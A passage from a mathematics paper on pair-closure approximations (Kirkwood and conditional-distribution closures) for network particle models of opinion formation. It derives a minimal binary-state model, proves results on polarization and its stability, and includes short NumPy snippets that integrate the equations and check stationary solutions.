+ \sum_{i \leq k} D_{s_i}^* (U_0(s_i) \mu^{\infty:k}_t) \nonumber \\ & \qquad \qquad - \sum_{i\leq k} D_{s_i}^* D_{s_i} (Q(s_i) \mu^{\infty:k}_t) - \sum_{i\leq k} \sum_{j \neq i, j \leq k} D_{w_{ij}}^*D_{w_{ij}}(R(s_i,s_j,w_{ij}) \mu^{\infty:k}_t)
\end{align}
which has a similar structure to the BBGKY/Vlasov hierarchy in kinetic theory. The closedness of the infinite system confirms our choice of marginals in the space of states and weights.
Let us mention that the first marginal is just the particle density in state space and satisfies
\begin{equation}
\partial_t \mu_t^{\infty:1} = D_{s_1}^* \left[ \int U(s_1,s_2,w_{12}) \mu_t^{\infty:2}(ds_2,dw_{12}) + U_0(s_1)\mu_t^{\infty:1}\right] - D_{s_1}^* D_{s_1} (Q(s_1) \mu_t^{\infty:1}).
\end{equation}
It is apparent that there is no simple closure or propagation of chaos in terms of $\mu_t^{\infty:1}$ as long as there is any nontrivial dependence of $U$ and $\mu_t^{\infty:2}$ on the weight $w_{12}$. As we shall see below, at least in the paradigmatic Vlasov-type model there is some kind of propagation of chaos for the system in terms of the states only, if the measures $\mu_t^{\infty:k}$ exhibit weight concentration phenomena, i.e., concentrate at $w_{ij} = W(s_i,s_j,t)$ for some function $W$.
For the description of the system and its nontrivial network structure the second marginal $\mu_t^{\infty:2}$ appears to be the more relevant quantity anyway. It satisfies
\begin{align} \label{eq:pairunclosed}
\partial_t \mu^{\infty:2}_t =& \sum_{i \leq 2} D_{s_i}^* \left[\int U(s_i,s_{3},w_{i3}) \mu_t^{\infty:3} (ds_3 dw_{13} dw_{23}) +
U_0(s_i)\mu_t^{\infty:2}- D_{s_i} (Q(s_i) \mu^{\infty:2}_t) \right] \nonumber \\ & + D_{w_{12}}^* \left[ V(s_1,s_2,w_{12}) \mu_t^{\infty:2} - D_{w_{12}}(R(s_1,s_2,w_{12}) \mu^{\infty:2}_t) \right]
\end{align}
We shall discuss below closure relations that approximate the solutions solely in terms of $\mu^{\infty:2}_t$.
\subsection{Pair Closures}
In the following we discuss different options for obtaining a closure in \eqref{eq:pairunclosed}.
A standard closure relation used in statistical mechanics is the so-called Kirkwood closure (cf. \cite{kirkwood,singer}), which approximates the triplet distribution by
pair and single-particle distributions; more precisely, it assumes a factorization of the triplet correlation into pair correlations.
The analogous form for our setting is given by
\begin{equation} \label{eq:kirkwood}
\mu_t^{ 3}(dz_3) = \frac{\mu_t^{ 2}(ds_1 ds_2 dw_{12})}{\mu_t^1(ds_1)\mu_t^1(ds_2)} \frac{\mu_t^{ 2}(ds_1 ds_3 dw_{13})}{\mu_t^1(ds_1)\mu_t^1(ds_3)} \frac{\mu_t^{ 2}(ds_2 ds_3 dw_{23})}{\mu_t^1(ds_2)\mu_t^1(ds_3)} \mu_t^1(ds_1)\mu_t^1(ds_2)\mu_t^1(ds_3)
\end{equation}
where the quotients denote the respective Radon-Nikodym derivatives. The Kirkwood closure might yield an overly complicated system for the pair distribution, which we see by examining the relevant terms, namely the integrals of $U$ in \eqref{eq:pairunclosed}. For $i=1$ we have
$$ \int U(s_1,s_{3},w_{13}) \mu_t^{\infty:3} (ds_3 dw_{13} dw_{23}) = \int U(s_1,s_{3},w_{13}) \eta_t^2 \mu_t^{ 2}(ds_1 ds_2 dw_{12}) \frac{\mu_t^{ 2}(ds_1 ds_3 dw_{13})}{\mu_t^1(ds_1) }
$$
where $\eta_t^2$ is the Radon-Nikodym derivative of the $(s_2,s_3)$-marginal of $\mu_t^2$ with respect to the product $\mu_t^1 \otimes \mu_t^1$, i.e. for each set $A \subset {\cal S}^2$,
$$ \int_A \eta_t^2 \mu_t^1(ds_2)\mu_t^1(ds_3) = \int_A \int_{{\cal W}} {\mu_t^{ 2}(ds_2 ds_3 dw_{23})} . $$
Note that $\frac{\mu_t^{ 2}(ds_1 ds_3 dw_{13})}{\mu_t^1(ds_1) }$ is the conditional distribution of $s_3$ and $w_{13}$ given $s_1$.
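As a sanity check, the Kirkwood closure is exact whenever the pair distributions factorise; this can be verified for discrete variables (the binary laws below are hypothetical):

```python
import numpy as np

# discrete check of the Kirkwood closure: for an independent triple the
# product of pair Radon-Nikodym derivatives reproduces mu^3 exactly
rng = np.random.default_rng(4)
p = rng.random(2); p /= p.sum()             # single-particle state law mu^1
q = rng.random(2); q /= q.sum()             # weight law, independent of the states

# independent triple mu^3(s1,s2,s3,w12,w13,w23) and pair mu^2(s,s',w)
mu3 = np.einsum('a,b,c,i,j,k->abcijk', p, p, p, q, q, q)
mu2 = np.einsum('a,b,i->abi', p, p, q)

ratio = mu2 / np.outer(p, p)[:, :, None]    # RN derivative d mu^2 / d(mu^1 x mu^1)
kirk = np.einsum('abi,acj,bck,a,b,c->abcijk', ratio, ratio, ratio, p, p, p)
```

For correlated pair distributions the reconstruction is of course only an approximation; the check merely illustrates the factorization structure of \eqref{eq:kirkwood}.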
As argued for a similar class of particle systems (without the network weights) in \cite{berlyand1,berlyand2}, $\eta_t^2$ seems to be unnecessary for a suitable approximation of the integrals, hence their closure simplifies to
\begin{equation} \label{eq:berlyand}
\int U(s_i,s_{3},w_{i3}) \mu_t^{\infty:3} (ds_3 dw_{13} dw_{23}) = \int U(s_i,s_{3},w_{i3}) \mu_t^{ 2}(ds_1 ds_2 dw_{12}) \frac{\mu_t^{ 2}(ds_i ds_3 dw_{i3})}{\mu_t^1(ds_i) } .
\end{equation}
In order to state the arising equation it is more convenient to use the weak formulation, for which we obtain
\begin{align}
\frac{d}{dt} \int \varphi(z_2) \mu^{ 2}_t(dz_2) =&
\sum_{i \leq 2} \int D_{s_i} \varphi(z_2) \left( \int U(s_i,s_{3},w_{i3}) \gamma_t(s_i;ds_3,dw_{i3}) +
U_0(s_i) \right) \mu_t^{2}(dz_2 ) - \nonumber \\ &
\sum_{i \leq 2} \int D_{s_i} \varphi(z_2) D_{s_i} (Q(s_i) \mu^{2}_t ) (dz_2 )
+ \nonumber \\ & \int D_{w_{12}} \varphi(z_2) \left( V(s_1,s_2,w_{12}) \mu_t^{ 2}(dz_2 ) - D_{w_{12}}(R(s_1,s_2,w_{12}) \mu^{2}_t)(dz_2 ) \right)
\end{align}
with the conditional distribution
$$ \gamma_t(s_i;ds_3,dw_{i3}) = \frac{\mu_t^{ 2}}{\mu_t^{ 1}}(ds_3,dw_{i3}).$$
\section{Minimal Model}
In the following we further study the minimal model \eqref{eq:minimal} with the above closures. With the short-hand notations
\begin{align}
f_{\pm,\pm} &= \mu_t^2(\pm 1, \pm 1, 1), \quad g_{\pm,\pm} = \mu_t^2(\pm 1, \pm 1, 0), \\
\rho_+ &= f_{++} + g_{++} + f_{+-} + g_{+-} \\
\rho_- &= f_{--} + g_{--} + f_{+-} + g_{+-}
\end{align}
noticing $f_{+-} = f_{-+}$ due to symmetry, we arrive at the following models: In the case of the closure based on the conditional distribution \eqref{eq:berlyand} we have
\begin{align}
\partial_t f_{++} =& \alpha_{-+} \frac{f_{+-}^2}{\rho_-} - \alpha_{+-} \frac{f_{++} f_{+-}}{\rho_+} + \beta_{++} g_{++} - \gamma_{++} f_{++}
\label{eq:minimal1} \\
\partial_t g_{++} =& \alpha_{-+} \frac{g_{+-}f_{+-}}{\rho_-} - \alpha_{+-} \frac{g_{++} f_{+-}}{\rho_+} - \beta_{++} g_{++} + \gamma_{++} f_{++} \\
\partial_t f_{--} =& \alpha_{+-} \frac{f_{+-}^2}{\rho_+} - \alpha_{-+} \frac{f_{--} f_{+-}}{\rho_-} + \beta_{--} g_{--} - \gamma_{--} f_{--} \\
\partial_t g_{--} =& \alpha_{+-} \frac{g_{+-}f_{+-}}{\rho_+} - \alpha_{-+} \frac{g_{--} f_{+-}}{\rho_-} - \beta_{--} g_{--} + \gamma_{--} f_{--} \\
\partial_t f_{+-} =& - \alpha_{-+} \frac{f_{+-}^2}{2\rho_-} + \alpha_{+-} \frac{f_{++} f_{+-}}{2\rho_+} - \alpha_{+-} \frac{f_{+-}^2}{2\rho_+} + \alpha_{-+} \frac{f_{--} f_{+-}}{2\rho_-} \nonumber \\
& +\beta_{+-} g_{+-} - \gamma_{+-} f_{+-} \\
\partial_t g_{+-} =& - \alpha_{-+} \frac{g_{+-}f_{+-}}{2\rho_-} + \alpha_{+-} \frac{g_{++} f_{+-}}{2\rho_+} - \alpha_{+-} \frac{g_{+-}f_{+-}}{2\rho_+} + \alpha_{-+} \frac{g_{--} f_{+-}}{2\rho_-} \nonumber \\ & - \beta_{+-} g_{+-} + \gamma_{+-} f_{+-} \label{eq:minimal6}
\end{align}
We can also introduce the weight-averaged densities $h_{\pm\pm} = f_{\pm\pm} + g_{\pm\pm}$, which satisfy the equations
\begin{align}
\partial_t h_{++} =& \alpha_{-+} \frac{h_{+-}f_{+-} }{\rho_-} - \alpha_{+-} \frac{h_{++} f_{+-}}{\rho_+} \\
\partial_t h_{--} =& \alpha_{+-} \frac{h_{+-}f_{+-}}{\rho_+} - \alpha_{-+} \frac{h_{--} f_{+-}}{\rho_-} \\
\partial_t h_{+-} =& - \frac{1}2 (\partial_t h_{++} + \partial_t h_{--}),
\end{align}
the latter being equivalent to the conservation property $\partial_t (\rho_- + \rho_+) = 0$.
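The closed system \eqref{eq:minimal1}-\eqref{eq:minimal6} is easily integrated numerically; the following explicit Euler sketch (with hypothetical rates) also illustrates the conservation of $\rho_+$ for $\alpha_{+-} = \alpha_{-+}$ and of the total mass:

```python
import numpy as np

# right-hand side of the pair system with conditional-distribution closure;
# y = (f++, g++, f--, g--, f+-, g+-), all rate values below are hypothetical
def rhs(y, a_pm, a_mp, b_pp, g_pp, b_mm, g_mm, b_pm, g_pm):
    fpp, gpp, fmm, gmm, fpm, gpm = y
    rp = fpp + gpp + fpm + gpm              # rho_+
    rm = fmm + gmm + fpm + gpm              # rho_-
    return np.array([
        a_mp*fpm**2/rm - a_pm*fpp*fpm/rp + b_pp*gpp - g_pp*fpp,
        a_mp*gpm*fpm/rm - a_pm*gpp*fpm/rp - b_pp*gpp + g_pp*fpp,
        a_pm*fpm**2/rp - a_mp*fmm*fpm/rm + b_mm*gmm - g_mm*fmm,
        a_pm*gpm*fpm/rp - a_mp*gmm*fpm/rm - b_mm*gmm + g_mm*fmm,
        (-a_mp*fpm**2/(2*rm) + a_pm*fpp*fpm/(2*rp) - a_pm*fpm**2/(2*rp)
         + a_mp*fmm*fpm/(2*rm) + b_pm*gpm - g_pm*fpm),
        (-a_mp*gpm*fpm/(2*rm) + a_pm*gpp*fpm/(2*rp) - a_pm*gpm*fpm/(2*rp)
         + a_mp*gmm*fpm/(2*rm) - b_pm*gpm + g_pm*fpm),
    ])

params = dict(a_pm=1.0, a_mp=1.0, b_pp=0.5, g_pp=0.5,
              b_mm=0.5, g_mm=0.5, b_pm=0.2, g_pm=1.0)
y = np.array([0.15, 0.15, 0.15, 0.15, 0.1, 0.1])   # h++ + h-- + 2 h+- = 1
dt = 0.01
for _ in range(2000):
    y = y + dt * rhs(y, **params)

rho_p = y[0] + y[1] + y[4] + y[5]
total = y[0] + y[1] + y[2] + y[3] + 2.0 * (y[4] + y[5])
```

Summing the components of the right-hand side reproduces \eqref{eq:rhoplusevolution} term by term, so the Euler scheme inherits both conservation properties up to round-off.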
For the Kirkwood closure we find instead
\begin{align}
\partial_t f_{++} =& \alpha_{-+} \frac{f_{+-}^2}{\rho_-} \frac{h_{++}}{\rho_+^2} - \alpha_{+-} \frac{f_{++} f_{+-}}{\rho_+} \frac{h_{+-}}{\rho_+ \rho_-}+ \beta_{++} g_{++} - \gamma_{++} f_{++}
\label{eq:minimalk1} \\
\partial_t g_{++} =& \alpha_{-+} \frac{g_{+-}f_{+-}}{\rho_-} \frac{h_{++}}{\rho_+^2} - \alpha_{+-} \frac{g_{++} f_{+-}}{\rho_+} \frac{h_{+-}}{\rho_+ \rho_-}- \beta_{++} g_{++} + \gamma_{++} f_{++} \\
\partial_t f_{--} =& \alpha_{+-} \frac{f_{+-}^2}{\rho_+} \frac{h_{--}}{\rho_-^2}- \alpha_{-+} \frac{f_{--} f_{+-}}{\rho_-} \frac{h_{+-}}{\rho_+ \rho_-}+ \beta_{--} g_{--} - \gamma_{--} f_{--} \\
\partial_t g_{--} =& \alpha_{+-} \frac{g_{+-}f_{+-}}{\rho_+} \frac{h_{--}}{\rho_-^2} - \alpha_{-+} \frac{g_{--} f_{+-}}{\rho_-} \frac{h_{+-}}{\rho_+ \rho_-}- \beta_{--} g_{--} + \gamma_{--} f_{--} \\
\partial_t f_{+-} =& - \alpha_{-+} \frac{f_{+-}^2}{2\rho_-} \frac{h_{++}}{\rho_+^2} + \alpha_{+-} \frac{f_{++} f_{+-}}{2\rho_+} \frac{h_{+-}}{\rho_+ \rho_-} - \alpha_{+-} \frac{f_{+-}^2}{2\rho_+} \frac{h_{--}}{\rho_-^2} \nonumber \\
&+ \alpha_{-+} \frac{f_{--} f_{+-}}{2\rho_-} \frac{h_{+-}}{\rho_+ \rho_-} +\beta_{+-} g_{+-} - \gamma_{+-} f_{+-} \\
\partial_t g_{+-} =& - \alpha_{-+} \frac{g_{+-}f_{+-}}{2\rho_-} \frac{h_{++}}{\rho_+^2}+ \alpha_{+-} \frac{g_{++} f_{+-}}{2\rho_+} \frac{h_{+-}}{\rho_+ \rho_-} - \alpha_{+-} \frac{g_{+-}f_{+-}}{2\rho_+} \frac{h_{--}}{\rho_-^2}\nonumber \\ &+ \alpha_{-+} \frac{g_{--} f_{+-}}{2\rho_-} \frac{h_{+-}}{\rho_+ \rho_-} - \beta_{+-} g_{+-} + \gamma_{+-} f_{+-} \label{eq:minimalk6}
\end{align}
The equations for the weight-averaged densities are given by
\begin{align}
\partial_t h_{++} =& \alpha_{-+} \frac{h_{+-}f_{+-} }{\rho_-} \frac{h_{++}}{\rho_+^2} - \alpha_{+-} \frac{h_{++} f_{+-}}{\rho_+} \frac{h_{+-}}{\rho_+ \rho_-} \\
\partial_t h_{--} =& \alpha_{+-} \frac{h_{+-}f_{+-}}{\rho_+} \frac{h_{--}}{\rho_-^2} - \alpha_{-+} \frac{h_{--} f_{+-}}{\rho_-} \frac{h_{+-}}{\rho_+ \rho_-}\\
\partial_t h_{+-} =& - \frac{1}2 (\partial_t h_{++} + \partial_t h_{--}).
\end{align}
\subsection{Transient Solutions}
In order to provide a first analysis of solutions to \eqref{eq:minimal1}-\eqref{eq:minimal6}, a key step is to consider the
evolution of the single-particle densities $\rho_+$ and $\rho_-$. We find
\begin{equation} \label{eq:rhoplusevolution}
\partial_t \rho_+ = - \partial_t \rho_- = \left( \frac{\alpha_{-+}}2 - \frac{\alpha_{+-}}2\right) f_{+-},
\end{equation}
in the case of \eqref{eq:minimal1}-\eqref{eq:minimal6}, and
\begin{equation} \label{eq:rhoplusevolutionk}
\partial_t \rho_+ = - \partial_t \rho_- = \left( \frac{\alpha_{-+}}2 - \frac{\alpha_{+-}}2\right) \frac{\rho_- h_{++}+ \rho_+ h_{--}}{\rho_+ \rho_-} \frac{h_{+-}}{\rho_+ \rho_-}f_{+-},
\end{equation}
in the case of \eqref{eq:minimalk1}-\eqref{eq:minimalk6},
which implies first of all that $\rho_+$ is conserved if $\alpha_{-+} = \alpha_{+-}$. We also find the natural properties that $\rho_+$ increases if $\alpha_{-+} > \alpha_{+-}$, i.e. if there is a stronger bias towards the positive state, and decreases if $\alpha_{-+} < \alpha_{+-}$. In these cases we see immediately that concentration (consensus in the language of opinion formation) is reached if $f_{+-}$ is bounded away from zero. With a standard proof (see Appendix) we obtain the following result:
\begin{thm} \label{minimalexistencethm}
For each nonnegative starting value with $\rho_+(0) \in (0,1)$, $\rho_-(0) = 1 - \rho_+(0)$, there exists a time $T_* > 0$ such that there exists a unique solution
$$ (f_{++},g_{++},f_{--},g_{--},f_{+-},g_{+-}) \in C^\infty([0,T_*))^6 $$
of \eqref{eq:minimal1}-\eqref{eq:minimal6} as well as of \eqref{eq:minimalk1}-\eqref{eq:minimalk6}. Moreover, either $T_* = \infty$ or $\rho_+(t) \rho_-(t) \rightarrow 0$
as $t \uparrow T_*$. If $\alpha_{-+} = \alpha_{+-}$ then $T_* = \infty$.
\end{thm}
If $T_*$ is finite we thus see that either the limit of $\rho_+$ or $\rho_-$ vanishes, and since $f_{+-} \leq \rho_+$ and $f_{+-} \leq \rho_-$ we obtain $f_{+-}(t) \rightarrow 0$ as well. This is not surprising, since such a state means consensus at one of the two states and hence there are no agents of the other state to connect to. A possibly more interesting situation can happen if $T_* = \infty$: then we might have polarization, i.e. $f_{+-} = 0$ with $\rho_+$ and $\rho_-$ both being positive. This means there are agents of either state but no connection between them. A direct insight can be obtained by simply integrating \eqref{eq:rhoplusevolution} in time, which yields
$$ 1 \geq \left| \frac{\alpha_{-+}}2 - \frac{\alpha_{+-}}2\right| \int_0^\infty f_{+-}(t)~dt. $$
If the coefficient on the right-hand side is nonzero, $f_{+-}$ is integrable, which implies the following result:
\begin{cor}
Let $\alpha_{-+} \neq \alpha_{+-}$ and let $ (f_{++},g_{++},f_{--},g_{--},f_{+-},g_{+-}) \in C^\infty([0,T_*))^6 $ be the unique solution of \eqref{eq:minimal1}-\eqref{eq:minimal6}. If $T_* = \infty$, then $f_{+-}(t) \rightarrow 0$ as $t \rightarrow \infty$.
\end{cor}
As a consequence of this result we may expect to find polarized stationary solutions of the minimal model with closure based on the conditional distribution \eqref{eq:minimal1}-\eqref{eq:minimal6}, which we further investigate in an asymptotic parameter regime below.
A similar analysis for the minimal model with Kirkwood closure \eqref{eq:minimalk1}-\eqref{eq:minimalk6} is less obvious due to the additional terms in \eqref{eq:rhoplusevolutionk}. With $\rho_+ \leq 1$, $\rho_- \leq 1$, and $h_{+-} \geq f_{+-}$ we can at least infer the
integrability of $ (h_{++} + h_{--}) f_{+-}^2, $ which yields $f_{+-} \rightarrow 0$ or $h_{++} + h_{--} \rightarrow 0$. The latter can only happen if $\rho_+ - \rho_- = h_{++} - h_{--} \rightarrow 0$. This kind of limiting solution with $h_{++}=h_{--}=0$ and $h_{+-}=\frac{1}2$ actually appears to be a deficiency of the Kirkwood closure in describing the many-particle limit. Such a solution can appear in the case of two particles, one in the $+$ and one in the $-$ state. As soon as there are three or more particles, we will find at least two of them in the same state, which implies $h_{++} + h_{--} > 0$.
\subsection{Stationary Solutions and Polarization}
In order to understand possible segregation phenomena we study the stationary solutions of \eqref{eq:minimal1}-\eqref{eq:minimal6}, focusing in particular on the case when two nodes are mainly connected if they have the same state and rather disconnected if they have opposite states. This means that $\beta_{+-}$ is small and $\gamma_{+-}$ is rather large.
We first study the stationary equations for $h_{++}$ and $h_{--}$ in the case of the conditional distribution based closure, which yields $f_{+-}=0$ or
$$ h_{++} = \frac{\alpha_{-+} \rho_+ h_{+-}}{\alpha_{+-} \rho_-}, \quad h_{--} = \frac{\alpha_{+-} \rho_- h_{+-}}{\alpha_{-+} \rho_+}.$$
Together with
$$ 1 = \rho_+ + \rho_- = h_{++} + h_{--} + 2 h_{+-} $$
we arrive at
\begin{align*} &h_{++} = \frac{\alpha_{-+}^2 \rho_+^2}{(\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2}, \quad h_{--}=\frac{ \alpha_{+-}^2 (1- \rho_+)^2}{(\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2}, \\
&h_{+-}=\frac{\alpha_{-+}\alpha_{+-} \rho_+ (1- \rho_+)}{(\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2}.
\end{align*}
Let us mention that in the case $\alpha_{+-} = \alpha_{-+} = \alpha$, they considerably simplify to
$$ h_{++} = \rho_+^2 , \quad h_{--}= \rho_-^2 = (1- \rho_+)^2 , \quad h_{+-}= \rho_+ \rho_- = \rho_+ (1- \rho_+) , $$
which corresponds to mixed states and weights. Thus, in order to understand polarization we will focus on the case $f_{+-} =0$ first.
In the case of the Kirkwood closure, solutions with $f_{+-}>0$ (and thus $h_{+-}>0$) are obtained only for $h_{++}=h_{--}=0$, which are again not the ones relevant for the many-particle limit.
\subsubsection{No link creation between opposite states}
In order to understand the segregation phenomenon in the model, let us first consider the most extreme case of $\beta_{+-} = 0$, hence there are no links created between agents of opposite states $+1$ and $-1$. In this case we trivially find stationary solutions with $f_{+-} =0$:
\begin{prop} \label{minimalstatprop}
Let $\beta_{+-}=0$, $\beta_{++}+\gamma_{++} >0$, and $\beta_{--}+\gamma_{--} >0$. Then there exists an infinite number of stationary solutions of \eqref{eq:minimal1}-\eqref{eq:minimal6} as well as of \eqref{eq:minimalk1}-\eqref{eq:minimalk6} with $f_{+-}=0$, $\rho_+ \in [0,1]$ arbitrary, $g_{+-} \in [0,\min\{\rho_+,1-\rho_+\}]$ arbitrary,
and
\begin{align*}
f_{++} &= \frac{\beta_{++}}{\beta_{++}+\gamma_{++}}(\rho_+ - g_{+-}), &&
g_{++} = \frac{\gamma_{++}}{\beta_{++}+\gamma_{++}} (\rho_+ - g_{+-}),\\
f_{--} &= \frac{\beta_{--}}{\beta_{--}+\gamma_{--}} (1-\rho_+ - g_{+-}), &&
g_{--} = \frac{\gamma_{--}}{\beta_{--}+\gamma_{--}} (1-\rho_+ - g_{+-}).
\end{align*}
\end{prop}
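The stationary family of Proposition \ref{minimalstatprop} is easily verified numerically: for $\beta_{+-}=0$ and $f_{+-}=0$ every $\alpha$-term in \eqref{eq:minimal1}-\eqref{eq:minimal6} carries a factor $f_{+-}$ and vanishes, so only the link creation/removal balances remain (all parameter values below are hypothetical):

```python
# check of the stationary family for beta_{+-} = 0, f_{+-} = 0; with f_{+-} = 0
# every state-flip term vanishes, so only the link balance conditions remain
b_pp, g_pp = 0.3, 0.7                       # beta_{++}, gamma_{++}
b_mm, g_mm = 0.4, 0.6                       # beta_{--}, gamma_{--}
g_pm_rate = 1.0                             # gamma_{+-}; beta_{+-} = 0
rho_p, gpm = 0.6, 0.2                       # free parameters of the family

fpp = b_pp / (b_pp + g_pp) * (rho_p - gpm)
gpp = g_pp / (b_pp + g_pp) * (rho_p - gpm)
fmm = b_mm / (b_mm + g_mm) * (1.0 - rho_p - gpm)
gmm = g_mm / (b_mm + g_mm) * (1.0 - rho_p - gpm)
fpm = 0.0

# residuals of the remaining stationary equations
res_pp = b_pp * gpp - g_pp * fpp            # balance for (f++, g++)
res_mm = b_mm * gmm - g_mm * fmm            # balance for (f--, g--)
res_pm = 0.0 * gpm - g_pm_rate * fpm        # beta_{+-} g_{+-} - gamma_{+-} f_{+-}
```

The residuals vanish for every admissible choice of the free parameters $\rho_+$ and $g_{+-}$, reflecting the degeneracy of the stationary set.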
The above type of stationary solutions yields a polarization, i.e. unless $\rho_+ = 1$ or $\rho_+ = 0$ the network consists of two parts with states $+1$ and $-1$, and nodes with different states are never connected by an edge.
From the linearized equations of \eqref{eq:minimal1}-\eqref{eq:minimal6} around the stationary state (see Appendix \ref{appendixminimal}) we expect the polarization to be stable if
\begin{equation}
\gamma_{+-} > \frac{\beta_{++}}{\beta_{++}+\gamma_{++}} \frac{ \alpha_{+-} \alpha_{-+}^2 \rho_+}{2 (\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2} + \frac{\beta_{--}}{\beta_{--}+\gamma_{--}} \frac{\alpha_{-+} \alpha_{+-}^2 (1-\rho_+)^2}{2(\alpha_{-+} \rho_+ + \alpha_{+-} (1-\rho_+))^2}. \label{minimallinstabcondition}
\end{equation}
The linearized problem has a threefold zero eigenvalue however, which makes a rigorous analysis based on linear stability difficult. An analogous result with a slightly different condition holds for the linearization of \eqref{eq:minimalk1}-\eqref{eq:minimalk6}. Nevertheless, we can provide a nonlinear stability result under a slightly stronger condition.
We see that a sufficient condition for \eqref{minimallinstabcondition} is $ 2 \gamma_{+-} > \alpha_{+-} + \alpha_{-+}$, which is even sufficient for nonlinear stability of a polarized state:
\begin{thm} \label{thm:nonlinstab}
Let $\beta_{+-} = 0$ and $ 2 \gamma_{+-} > \alpha_{+-} + \alpha_{-+}$, and let $(f_{++},g_{++},f_{--},g_{--},f_{+-},g_{+-})$ be a nonnegative solution of \eqref{eq:minimal1}-\eqref{eq:minimal6}. Then
$$ f_{+-}(t) \leq e^{-(\gamma_{+-}- \frac{\alpha_{+-} + \alpha_{-+}}2)t} f_{+-}(0), $$
in particular $f_{+-}(t) \rightarrow 0 $ as $t \rightarrow \infty$.
\end{thm}
\begin{proof}
Using the nonnegativity of the solution we have $f_{++} \leq \rho_+$ and $f_{--} \leq \rho_-$ and thus
\begin{align*} \partial_t f_{+-} =& - \alpha_{-+} \frac{f_{+-}^2}{2\rho_-} - \alpha_{+-} \frac{f_{+-}^2}{2\rho_+} + \left( \alpha_{+-} \frac{f_{++} }{2\rho_+} + \alpha_{-+} \frac{f_{--} }{2\rho_-} - \gamma_{+-} \right) f_{+-} \\
\leq& \left( \frac{\alpha_{+-} }{2 } + \frac{\alpha_{-+} }{2 } - \gamma_{+-} \right) f_{+-} ,
\end{align*}
which implies the assertion due to Gronwall's Lemma.
\end{proof}
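The exponential decay of Theorem \ref{thm:nonlinstab} can also be observed numerically; the following Euler sketch (hypothetical rates with $\beta_{+-}=0$ and $2\gamma_{+-} > \alpha_{+-}+\alpha_{-+}$) checks the bound at the final time:

```python
import numpy as np

# Euler integration of the pair system with beta_{+-} = 0; with
# alpha_{+-} = alpha_{-+} = 1 and gamma_{+-} = 2 the theorem predicts
# f_{+-}(t) <= exp(-t) f_{+-}(0). All parameter values are hypothetical.
a_pm = a_mp = 1.0
b_pp = g_pp = b_mm = g_mm = 0.5
b_pm, g_pm = 0.0, 2.0
dt, T = 0.005, 2.0

y = np.array([0.15, 0.15, 0.15, 0.15, 0.1, 0.1])  # (f++, g++, f--, g--, f+-, g+-)
for _ in range(int(T / dt)):
    fpp, gpp, fmm, gmm, fpm, gpm = y
    rp = fpp + gpp + fpm + gpm
    rm = fmm + gmm + fpm + gpm
    y = y + dt * np.array([
        a_mp*fpm**2/rm - a_pm*fpp*fpm/rp + b_pp*gpp - g_pp*fpp,
        a_mp*gpm*fpm/rm - a_pm*gpp*fpm/rp - b_pp*gpp + g_pp*fpp,
        a_pm*fpm**2/rp - a_mp*fmm*fpm/rm + b_mm*gmm - g_mm*fmm,
        a_pm*gpm*fpm/rp - a_mp*gmm*fpm/rm - b_mm*gmm + g_mm*fmm,
        (-a_mp*fpm**2/(2*rm) + a_pm*fpp*fpm/(2*rp) - a_pm*fpm**2/(2*rp)
         + a_mp*fmm*fpm/(2*rm) + b_pm*gpm - g_pm*fpm),
        (-a_mp*gpm*fpm/(2*rm) + a_pm*gpp*fpm/(2*rp) - a_pm*gpm*fpm/(2*rp)
         + a_mp*gmm*fpm/(2*rm) - b_pm*gpm + g_pm*fpm),
    ])

bound = 0.1 * np.exp(-(g_pm - (a_pm + a_mp) / 2.0) * T)
```

Since each Euler step multiplies $f_{+-}$ by at most $1 - (\gamma_{+-} - \frac{\alpha_{+-}+\alpha_{-+}}2)\,dt \leq e^{-(\gamma_{+-} - \frac{\alpha_{+-}+\alpha_{-+}}2)\,dt}$ as long as the solution stays nonnegative, the discrete trajectory inherits the bound.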
An analogous result can be obtained for the Kirkwood closure, with a slightly stronger condition:
\begin{thm}
Let $\beta_{+-} = 0$ and $ \gamma_{+-} > \alpha_{+-} + \alpha_{-+}$, and let $(f_{++},g_{++},f_{--},g_{--},f_{+-},g_{+-})$ be a nonnegative solution of \eqref{eq:minimalk1}-\eqref{eq:minimalk6}. Then
$$ f_{+-}(t) \leq e^{-(\gamma_{+-}- (\alpha_{+-} + \alpha_{-+}))t} f_{+-}(0), $$
in particular $f_{+-}(t) \rightarrow 0 $ as $t \rightarrow \infty$.
\end{thm}
\begin{proof}
The proof is analogous to the one of Theorem \ref{thm:nonlinstab} using the following estimate for the additional term
$$ \frac{h_{+-}}{\rho_+ \rho_-} \leq \min\left\{ \frac{1}{\rho_+}, \frac{1}{\rho_-} \right\} \leq 2. $$
\end{proof}
\subsubsection{Rare link creation between opposite states}
Having understood the above extreme case of no link creation between nodes of opposite states, we can also extend to the case of rare link creation, i.e. $\beta_{+-}$ small. For simplicity of notation we set $\epsilon = \beta_{+-}$ and perform an asymptotic analysis around $\epsilon = 0$ via the implicit function theorem.
\begin{prop} \label{smallepsilonprop}
Let all parameters $\alpha_{**}, \beta_{**}, \gamma_{**}$ be positive and let
$$ 2 \gamma_{+-} > \alpha_{+-} + \alpha_{-+}.$$ Then there exists $\epsilon_0 > 0$ such that for all $\beta_{+-}=\epsilon \in [0,\epsilon_0)$ there exists an infinite number of stationary solutions of \eqref{eq:minimal1}-\eqref{eq:minimal6} with $\rho_+ \in [0,1]$ and $f_{+-} = {\cal O}(\epsilon)$.
\end{prop}
Let us remark that the condition $2 \gamma_{+-} > \alpha_{+-} + \alpha_{-+}$ is not optimal in Proposition \ref{smallepsilonprop}; it was just used to obtain a condition that holds independently of $\rho_+$. If we are interested in the behaviour at a specific value of $\rho_+$ only, it could indeed be replaced by \eqref{minimallinstabcondition}. With an analogous proof we can give a statement for the Kirkwood closure:
\begin{prop}
Let all parameters $\alpha_{**}, \beta_{**}, \gamma_{**}$ be positive and let
$$ \gamma_{+-} > \alpha_{+-} + \alpha_{-+}.$$ Then there exists $\epsilon_0 > 0$ such that for all $\beta_{+-}=\epsilon \in [0,\epsilon_0)$ there exists an infinite number of stationary solutions of \eqref{eq:minimalk1}-\eqref{eq:minimalk6} with $\rho_+ \in [0,1]$ and $f_{+-} = {\cal O}(\epsilon)$.
\end{prop}
\section{Vlasov-type model}
In the following we further investigate the paradigmatic model based on the Vlasov-type dynamics, corresponding to the microscopic model \eqref{eq:microscopic1}, \eqref{eq:microscopic2}, respectively the Liouville equation \eqref{eq:liouville}, and the corresponding infinite hierarchy, given in weak formulation by
\begin{align}
